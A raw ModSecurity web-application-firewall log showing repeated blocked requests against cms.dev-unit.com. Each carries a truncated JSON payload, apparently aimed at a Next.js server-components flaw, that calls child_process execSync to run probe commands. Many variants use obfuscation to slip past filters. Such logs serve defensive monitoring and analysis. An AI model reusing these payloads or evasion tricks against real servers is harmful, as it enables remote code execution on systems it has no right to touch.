"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1T-XKUNJEHmNu6G7zQAAAIc"] [Sun Apr 05 15:42:45.795930 2026] [:error] [pid 13019:tid 13252] [client 172.94.9.253:46914] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(decodeURIComponent(decodeURIComponent('echo%20%24%28%2841%2A271%29%29'))).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_c..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1bxQSOrq_iRTM7dqvAAAAQw"] [Sun Apr 05 15:42:45.796692 2026] [:error] [pid 13019:tid 13249] [client 172.94.9.253:46940] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1bxQSOrq_iRTM7dqvQAAAQk"] [Sun Apr 05 15:42:45.799455 2026] [:error] [pid 23077:tid 23083] [client 172.94.9.253:46952] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1Zc83uMXRUE9zvQTgQAAAcA"] [Sun Apr 05 15:42:45.808899 2026] [:error] [pid 23077:tid 23107] [client 172.94.9.253:46928] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/home"] [unique_id "adJm1Zc83uMXRUE9zvQTggAAAdg"] [Sun Apr 05 15:42:45.816649 2026] [:error] [pid 22788:tid 22800] [client 172.94.9.253:46932] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "adJm1SLbhFL16Wsx-C9DDQAAAYo"] [Sun Apr 05 15:42:45.822081 2026] [:error] [pid 13019:tid 13241] [client 172.94.9.253:46972] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/blog"] [unique_id "adJm1bxQSOrq_iRTM7dqvgAAAQE"] [Sun Apr 05 15:42:45.847587 2026] [:error] [pid 13019:tid 13254] [client 172.94.9.253:46988] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1bxQSOrq_iRTM7dqvwAAAQ4"] [Sun Apr 05 15:42:45.847638 2026] [:error] [pid 23077:tid 23095] [client 172.94.9.253:47004] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/post"] [unique_id "adJm1Zc83uMXRUE9zvQTgwAAAcw"] [Sun Apr 05 15:42:45.848433 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:46990] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1bxQSOrq_iRTM7dqwQAAAQY"] [Sun Apr 05 15:42:45.848756 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:47006] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/settings"] [unique_id "adJm1bxQSOrq_iRTM7dqwAAAARA"] [Sun Apr 05 15:42:45.883362 2026] [:error] [pid 23077:tid 23093] [client 172.94.9.253:47012] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1Zc83uMXRUE9zvQThQAAAco"] [Sun Apr 05 15:42:45.885002 2026] [:error] [pid 13019:tid 13251] [client 172.94.9.253:47028] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1bxQSOrq_iRTM7dqwgAAAQs"] [Sun Apr 05 15:42:45.888661 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:47052] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var\\x5ctres=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw\\x5ctObject.assign(new\\x5ctError('NEXT_REDIRECT'),{digest:\\x5ct`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1Zc83uMXRUE9zvQThgAAAcU"] [Sun Apr 05 15:42:45.889889 2026] [:error] [pid 22788:tid 22802] [client 172.94.9.253:47022] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1SLbhFL16Wsx-C9DDgAAAYw"] [Sun Apr 05 15:42:45.893548 2026] [:error] [pid 23077:tid 23086] [client 172.94.9.253:47046] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1Zc83uMXRUE9zvQThwAAAcM"] [Sun Apr 05 15:42:45.893650 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:47026] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/posts"] [unique_id "adJm1bxQSOrq_iRTM7dqwwAAARg"] [Sun Apr 05 15:42:45.958831 2026] [:error] [pid 31198:tid 31265] [client 172.94.9.253:47106] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1TT5TgrBR8xRnfXBNQAAAU0"] [Sun Apr 05 15:42:45.958850 2026] [:error] [pid 13019:tid 13248] [client 172.94.9.253:47064] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1bxQSOrq_iRTM7dqxQAAAQg"] [Sun Apr 05 15:42:45.958865 2026] [:error] [pid 23077:tid 23091] [client 172.94.9.253:47090] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('ZWNobyAkKCg0MSoyNzEpKQ==','base64').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/users"] [unique_id "adJm1Zc83uMXRUE9zvQTiQAAAcg"] [Sun Apr 05 15:42:45.959337 2026] [:error] [pid 23077:tid 23104] [client 172.94.9.253:47126] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:0 outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/account"] [unique_id "adJm1Zc83uMXRUE9zvQTigAAAdU"] [Sun Apr 05 15:42:45.959682 2026] [:error] [pid 1503:tid 1534] [client 